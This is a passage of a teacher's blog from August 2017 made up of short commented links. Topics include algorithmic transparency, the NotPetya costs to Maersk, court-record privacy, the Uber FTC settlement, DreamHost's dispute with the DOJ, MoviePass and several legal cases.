algorithms are, we filed 42 open records requests in 23 states seeking essential information about six predictive algorithm programs.  We selected the most widely-used and well-reviewed programs, including those developed by for-profit companies, nonprofits, and academic/private sector partnerships.  The goal was to see if, using the open records process, we could discover what policy judgments these algorithms embody, and could evaluate their utility and fairness.  
To do this work, we identified what meaningful “algorithmic transparency” entails.  We found that in almost every case, it wasn’t provided.  Over-broad assertions of trade secrecy were a problem.  But contrary to conventional wisdom, they were not the biggest obstacle.  It will not usually be necessary to release the code used to execute predictive models in order to dramatically increase transparency.  We conclude that publicly-deployed algorithms will be sufficiently transparent only if (1) governments generate appropriate records about their objectives for algorithmic processes and subsequent implementation and validation; (2) government contractors reveal to the public agency sufficient information about how they developed the algorithm; and (3) public agencies and courts treat trade secrecy claims as the limited exception to public disclosure that the law requires.  Although it would require a multi-stakeholder process to develop best practices for record generation and disclosure, we present what we believe are eight principal types of information that such records should ideally contain.”


Keeping my students busy.


For my Geeks.


A reminder.


Last chance to get eclipse glasses?
Community College of Denver Solar Eclipse Party
Community College of Denver will be setting up two telescopes to safely view the 93% partial solar eclipse on August 21st.  One telescope is a Coronado Solarmax 60mm with an H-alpha solar filter, the other is a 6" Celestron scope with a broadband solar filter.  Safe viewing glasses provided.

Thursday, August 17, 2017

They purchased a company with less than perfect security and paid an additional price for that mistake. 
Shipping company Maersk says June cyberattack could cost it up to $300 million
Container shipping company A.P. Moller Maersk on Tuesday said it expects that computer issues triggered by the NotPetya cyberattack will cost the company as much as $300 million in lost revenue.
"In the last week of the [second] quarter we were hit by a cyber-attack, which mainly impacted Maersk Line, APM Terminals and Damco," Maersk CEO Soren Skou said in a statement.  "Business volumes were negatively affected for a couple of weeks in July and as a consequence, our Q3 results will be impacted.  We expect that the cyber-attack will impact results negatively by USD 200-300m."
Maersk Line was able to take bookings from existing customers two days after the attack, and things gradually got back to normal over the following week, the company said.  It said it did not lose third-party data as a result of the attack.


A change is coming.  Is that good or bad?
Privacy and Court Records: Online Access and the Loss of Practical Obscurity
Ardia, David S., Privacy and Court Records: Online Access and the Loss of Practical Obscurity (August 4, 2017).  University of Illinois Law Review, Vol. 2017, No. 5, 2017.  Available at SSRN: https://ssrn.com/abstract=3013704
“Court records present a conundrum for privacy advocates.  Public access to the courts has long been a fundamental tenet of American democracy, helping to ensure that our system of justice functions fairly and that citizens can observe the actions of their government.  Yet court records contain an astonishing amount of private and sensitive information, ranging from social security numbers to the names of sexual assault victims.  Until recently, the privacy harms that attended the public disclosure of court records were generally regarded as insignificant because court files were difficult to search and access.  But this “practical obscurity” is rapidly disappearing as the courts move from the paper-based world of the twentieth century to an interconnected, electronic world where physical and temporal barriers to information are eroding.  These changes are prompting courts — and increasingly, legislatures — to reconsider public access to court records.  Although this reexamination can be beneficial, a number of courts are abandoning the careful balancing of interests that has traditionally guided judges in access disputes and instead are excluding whole categories of information, documents, and cases from public access.  This approach, while superficially appealing, is contrary to established First Amendment principles that require case-specific analysis before access can be restricted and is putting at risk the public’s ability to observe the functioning of the courts and justice system.  This article pushes back against the categorical exclusion of information in court records.  In doing so, it makes three core claims.  First, the First Amendment provides a qualified right of public access to all court records that are material to a court’s exercise of its adjudicatory power.  Second, before a court can restrict public access, it must engage in a case-specific evaluation of the privacy and public access interests at stake.  
Third, per se categorical restrictions on public access are not permissible.  These conclusions do not leave the courts powerless to protect privacy, as some scholars assert.  We must discard the notion that the protection of privacy is exclusively the job of judges and court staff.  Instead, we need to shift the responsibility for protecting privacy to lawyers and litigants, who should not be permitted to include highly sensitive information in court files if it is not relevant to the case.  Of course, we cannot eliminate all private and sensitive information from court records, but as long as courts continue to provide physical access to their records, the First Amendment does not preclude court administrators from managing electronic access in order to retain some of the beneficial aspects of practical obscurity.  By minimizing the inclusion of unnecessary personal information in court files and by limiting the extent of electronic access to certain types of highly sensitive information, we can protect privacy while at the same time ensuring transparency and public accountability.”


Do they blame the Russians?  Partly. 
Partisanship, Propaganda, and Disinformation: Online Media and the 2016 U.S. Presidential Election
“The Berkman Klein Center for Internet & Society at Harvard University today released a comprehensive analysis of online media and social media coverage of the 2016 presidential campaign.  The report, “Partisanship, Propaganda, and Disinformation: Online Media and the 2016 U.S. Presidential Election,” documents how highly partisan right-wing sources helped shape mainstream press coverage and seize the public’s attention in the 18-month period leading up to the election.
“In this study, we document polarization in the media ecosystem that is distinctly asymmetric.  Whereas the left half of our spectrum is filled with many media sources from center to left, the right half of the spectrum has a substantial gap between center and right.  The core of attention from the center-right to the left is large mainstream media organizations of the center-left.  The right-wing media sphere skews to the far right and is dominated by highly partisan news organizations,” co-author and principal investigator Yochai Benkler stated.  In addition to Benkler, the report was authored by Robert Faris, Hal Roberts, Bruce Etling, Nikki Bourassa, and Ethan Zuckerman.
The fact that media coverage has become more polarized in general is not new, but the extent to which right-wing sites have become partisan is striking, the report says.  The study found that on the conservative side, more attention was paid to pro-Trump, highly partisan media outlets.  On the liberal side, by contrast, the center of gravity was made up largely of long-standing media organizations.  Robert Faris, the Berkman Klein Center’s research director, noted, “Consistent with concerns over echo chambers and filter bubbles, social media users on the left and the right rarely share material from outside their respective spheres, except where they find coverage that is favorable to their choice of candidate.  A key difference between the right and left is that Trump supporters found substantial coverage favorable to their side in left and center-left media, particularly coverage critical of Clinton.  In contrast, the messaging from right-wing media was consistently pro-Trump.”  Conservative opposition to Trump was strongest in the center-right, the portion of the political spectrum that wielded the least influence in media coverage of the election.  In this recently-emerged universe, Breitbart stands at the center of a right-wing media ecosystem and is surrounded by sites like Fox News, the Daily Caller, the Gateway Pundit, the Washington Examiner, Infowars, Conservative Treehouse, and Truthfeed, according to the report’s analysis.”


I’ve been trying to tell my international students about the rules of discovery.  They seem to find it a very difficult concept.
Waymo v. Uber: Judge says Uber lawyers ‘misled the court,’ wants to tell jurors so
Waymo may get an edge over rival Uber as the two head into an explosive trade secrets trial this fall after a federal judge on Wednesday said he’ll likely tell the jury how Uber’s lawyers “misled the court” and repeatedly failed to produce documents that could be important in the case. 
   Uber’s lawyers from Morrison & Foerster recently disclosed that their firm has some information taken from Levandowski’s electronic devices.  Waymo is convinced that information contains stolen documents, which it says Uber’s team spent months hiding from the court.
“Wrong,” Uber’s lawyer, Arturo Gonzalez, said Wednesday.  His firm has some information, he said, but not the allegedly stolen documents.
But U.S. District Judge William Alsup, who is presiding over the case, seemed to side with Waymo.
“I am concerned that Mr. Gonzalez failed to disclose that he had the documents and took a long time to come clean,” Alsup said.  “Maybe he can get on the stand and explain it away.  But I am inclined … to tell the jury exactly this scenario: that he was ordered to come clean, did not come clean, ordered to come clean again, and did not come clean — finally in June or July came clean.”


Might be amusing.
An Augmented Reality Hackathon for Teachers
Earlier this week I shared some ideas for creating and using your own augmented reality experiences in school.  Metaverse is the free platform that makes it possible for teachers and students to create their own augmented reality experiences.  If you haven't tried it yet, I highly recommend taking a crack at making your own augmented reality experience.  As some participants in my workshops this summer demonstrated, you really can create your own augmented reality experiences in as little as ten minutes.  Of course, the more time you spend using Metaverse, the more complex and robust you can make your augmented reality applications.
This weekend Metaverse is kicking off a hackathon for teachers.  The Metaverse Hackathon starts on Saturday, August 19th and runs through Saturday, August 26th.  The purpose of the hackathon is to showcase the creative augmented reality experiences that teachers make for educational uses.  The winner of the Metaverse Hackathon will receive $200 in classroom supplies.  You can get all of the details and register for the Metaverse Hackathon here.  I can't wait to see what everyone creates.


Perspective.  Is this the start of something?   
How artists can (finally) get paid in the digital age


For all my students.
   everyone should check out Wolfram Alpha’s Problem Generator.  But every dumbfounded student knows that you need more than one lasso to tame the perils of mathematics… so enter Symbolab Math Solver.
   Symbolab is meant to be a search engine for discovering the meaning of an equation, and it helps you do that not with search keywords but with mathematical symbols.
   The step-by-step solution helps you work through the explanation.  You have the option to hide the steps and work through it on your own.  Here are some key features:
  • The engine has more than 300 calculators. You can use the calculators (and graphing calculators) to solve a variety of equations and download the results in PDF.
  • Pick a topic and practice math equations. You can choose from pre-algebra, matrices, vectors, functions, exponents, trigonometry, calculus, and word problems.
  • Test yourself with quizzes. Check your progress with the quizzes on the site and also make your own.
  • Download PDF Cheatsheets. Print them and carry them around for handy reference (not to cheat during your exams).
  • Save your work in an online notebook. Register for an account and save your practice problems in a personal notebook.
  • Create groups. Make your own group and interact with other students.


I’m beginning to think this is for real!
   MoviePass has actually been around for several years, but high prices and countless restrictions have prevented it from really taking off.  But that may all be about to change…
MoviePass is now offering unlimited movies in theaters for $9.95 per month.  The only restrictions are that you’re limited to one film every day, and 3D and IMAX movies are off the menu entirely.  But beyond that it’s anything goes.  Which sounds too good to be true, to be honest.
How it works is that you pay MoviePass $9.95 every month via a debit card.  You then visit your local movie theater as usual, but MoviePass will pay for your ticket.  If you go once a month you’ll just about break even, but if you go more often than that you’ll be saving some serious cash.
This could be a win-win for everyone involved.  However, according to Variety, AMC is already trying to prevent MoviePass subscriptions from being used at its theaters.  The chain claims the pricing makes this an unsustainable model which will harm the movie business in the long run.

Wednesday, August 16, 2017

This nearly 500-page draft kind of sums everything up neatly.
NIST – Security and Privacy Controls for Information Systems and Organizations
“This publication provides a catalog of security and privacy controls for federal information systems and organizations to protect organizational operations and assets, individuals, other organizations, and the Nation from a diverse set of threats including hostile attacks, natural disasters, structural failures, human errors, and privacy risks.  The controls are flexible and customizable and implemented as part of an organization-wide process to manage risk.  The controls address diverse requirements derived from mission and business needs, laws, Executive Orders, directives, regulations, policies, standards, and guidelines.  The publication describes how to develop specialized sets of controls, or overlays, tailored for specific types of missions and business functions, technologies, environments of operation, and sector-specific applications.  Finally, the consolidated catalog of controls addresses security and privacy from a functionality perspective (i.e., the strength of functions and mechanisms) and an assurance perspective (i.e., the measure of confidence in the security or privacy capability).  Addressing both functionality and assurance ensures that information technology products and the information systems that rely on those products are sufficiently trustworthy.”


Helping my students understand the need to design security and privacy into systems from the beginning.  And to provide some kind of metric as part of the design!
Uber Settles FTC Allegations that It Made Deceptive Privacy and Data Security Claims
Uber Technologies, Inc. has agreed to implement a comprehensive privacy program and obtain regular, independent audits to settle Federal Trade Commission charges that the ride-sharing company deceived consumers by failing to monitor employee access to consumer personal information and by failing to reasonably secure sensitive consumer data stored in the cloud.


“We don’t care about this case, but…”
Apple, Facebook, Google and other tech giants tell the Supreme Court to protect cellphone data in a key, upcoming case
   The case before the nation’s justices is Carpenter vs. United States, and it stems from a 2011 investigation into a series of robberies in Detroit.  As part of the probe, law enforcement officials obtained information from nearby cell towers to determine the whereabouts of one of the suspects, Timothy Carpenter, without first obtaining a warrant.
As the Supreme Court considers the matter — including questions as to whether law enforcement must demonstrate probable cause before it can seek that location data — tech giants stressed in a new amicus brief that they “do not take a position on the outcome of this case.”
But the major players that signed it — including Airbnb, Cisco, Dropbox and Verizon, the only telecom giant to sign — do argue the need for greater Fourth Amendment safeguards “to ensure that the law realistically engages with Internet-based technologies and with people’s expectations of privacy in their digital data.”  


I want to play the “sound of doom” when my students open their exams.  Is that cruel?  I certainly hope so!
   The YouTube Audio Library launched in 2013 with 1,000+ free musical tracks.
   The channel now hosts more than five times that initial number.  All are high-quality 320 Kbps audio tracks and sound effects with a royalty-free license.


Another way to bug my students?


For the Movie Club. 
Ticket prices too high? MoviePass gets you into theaters for $10 a month
   even if audiences are currently fed up with the movie industry, a company called MoviePass is betting it can get them back in the seats, offering a movie a day for only $10 per month.
Founded in 2011, MoviePass is a subscription service that allows users to see movies in theaters (one movie per day) without buying a ticket each time.  Instead, the company pays for your ticket when you swipe your MoviePass card.
If it sounds crazy that a company could afford to let users watch movies every day for only $10 a month, it’s not.  The idea was similar to insurance: Not every user will actually see $10 worth of movies a month, so they end up subsidizing the users who do.
An iPhone or an Android phone is required to use MoviePass.


Because research should be cheap?  No doubt it’s the paid opinion that will sink your case. 
Free Law Project – We Have Every Free PACER Opinion on CourtListener.com
“At Free Law Project, we have gathered millions of court documents over the years, but it’s with distinct pride that we announce that we have now completed our biggest crawl ever.  After nearly a year of work, and with support from the U.S. Department of Labor and Georgia State University, we have collected every free written order and opinion that is available in PACER.  To accomplish this we used PACER’s “Written Opinion Report,” which provides many opinions for free.  This collection contains approximately 3.4 million orders and opinions from approximately 1.5 million federal district and bankruptcy court cases dating back to 1960.  More than four hundred thousand of these documents were scanned and required OCR, amounting to nearly two million pages of text extraction that we completed for this project.  All of the documents amassed are available for search in the RECAP Archive of PACER documents and via our APIs.  New opinions will be downloaded every night to keep the collection up to date.”


So that’s where my students got the idea!

Tuesday, August 15, 2017

Continuing our discussion of management decisions that were (or should have been) obviously wrong. 
Costco made $3.7 million selling ‘Tiffany’ rings. Now it must pay $19 million to the real Tiffany.
Costco must pay the storied jewelry company Tiffany & Co. more than $19 million for selling about 2,500 diamond rings falsely identified on store signs as “Tiffany” rings, a federal judge ruled Monday.
Costco’s management “displayed at best a cavalier attitude toward Costco’s use of the Tiffany name in conjunction with ring sales and marketing,” U.S. District Judge Laura Taylor Swain of the Southern District of New York wrote in her opinion.
   Swain wrote Costco “provided credible evidence” of the practice of using the terms “Tiffany setting” and “Tiffany style” generically throughout the jewelry industry.
The problem is Costco only used the word “Tiffany” when describing the rings in its signage, suggesting they were made by the jeweler rather than an imitation of its famous design.


This is obvious, isn’t it?
Judge says LinkedIn can't block startup from user’s public data
Judge Edward Chen in the northern district of California granted hiQ labs, an employment startup, a preliminary injunction that forces LinkedIn to remove any barriers keeping hiQ from accessing public profile information within 24 hours. 
HiQ’s operations depend on its ability to access public LinkedIn data.  The company sells analytics to clients including eBay, Capital One and GoDaddy that aim to help them with employee retention and recruitment. 
   LinkedIn argued that users might not want to have employers tracking changes on their profiles, for example if they are seeking a new job.
In his order, Chen argued that LinkedIn’s argument was flawed.
   HiQ argues that LinkedIn’s attempts to limit the startup’s ability to use public profile data are anti-competitive and a violation of so-called data scrapers’ free speech rights.


Taking the lead from the President or something DoJ thought up on their own? 
DreamHost fights government request seeking 1.3 million IP addresses of DisruptJ20 website visitors
Webhosting service DreamHost has said that the U.S. Department of Justice (DOJ) has requested information on everyone who visited DisruptJ20.org, a website that was set up to organize political protests against the U.S. administration. 
   Central to the request was information on the DisruptJ20.org website itself and its owner, but where things get contentious is in relation to the site’s visitors.  According to DreamHost, the DOJ’s request includes 1.3 million IP addresses covering each device that connected to the website.  This was in addition to “…contact information, email content, and photos of thousands of people — in an effort to determine who simply visited the website,” according to a blog post.  “This is, in our opinion, a strong example of investigatory overreach and a clear abuse of government authority,” the DreamHost statement added.
After challenging the DOJ’s request based on the “overbreadth” of the warrant, DreamHost received a copy of an “order to compel” filed by the DOJ in the Superior Court of the District of Columbia that sought to dismiss DreamHost’s counterarguments.  Last week, DreamHost filed its legal arguments in response.


Will this improve health or allow Aetna to more accurately calculate their risk? 
Apple and Aetna reportedly held secret meetings, plan to offer Apple Watch to 23 million insurance customers
Top executives from both companies met last Thursday and Friday in Southern California, according to CNBC.  Myoung Cha, who heads up Apple’s special health projects, led the talks, with hospital chief medical information officers from across the U.S. also in attendance.
   Aetna currently provides the Apple Watch to its more than 50,000 staffers.  The Hartford, Conn.-based insurance company also announced last September that it would subsidize the cost of Apple Watches for select large employers and individual customers.

(Related)  True or not, would this change the perception of Apple/Cisco security? 
Apple and the future of the insurance industry
   Apple CEO Tim Cook joined Cisco CEO Chuck Robbins at Cisco Live to reveal the firms are working to deliver lower-cost cybersecurity insurance to customers choosing to use Cisco equipment in combination with Apple kit.
"If your company is using Cisco and Apple, then the combination of these should make that insurance cost significantly less for you than it would if you were using some other personal network side and the other operating system in the mobile area," Cook said.
The idea is that insurers will be convinced to deliver lower premiums to enterprises who standardize around Apple/Cisco solutions.
Those who do will not be required to subsidize those who choose to use less secure combinations.


A great victory for the Dear Leader!  And no doubt the President will take full credit for it.
North Korea Stands Down On Threat To Guam


This has not been a problem with my students, but it might be useful in other classes.
Library Guides for Detecting Fake News – AALL Spectrum July 2017


I would never, ever do this. 


I should remind my students, but I bet they all know about this.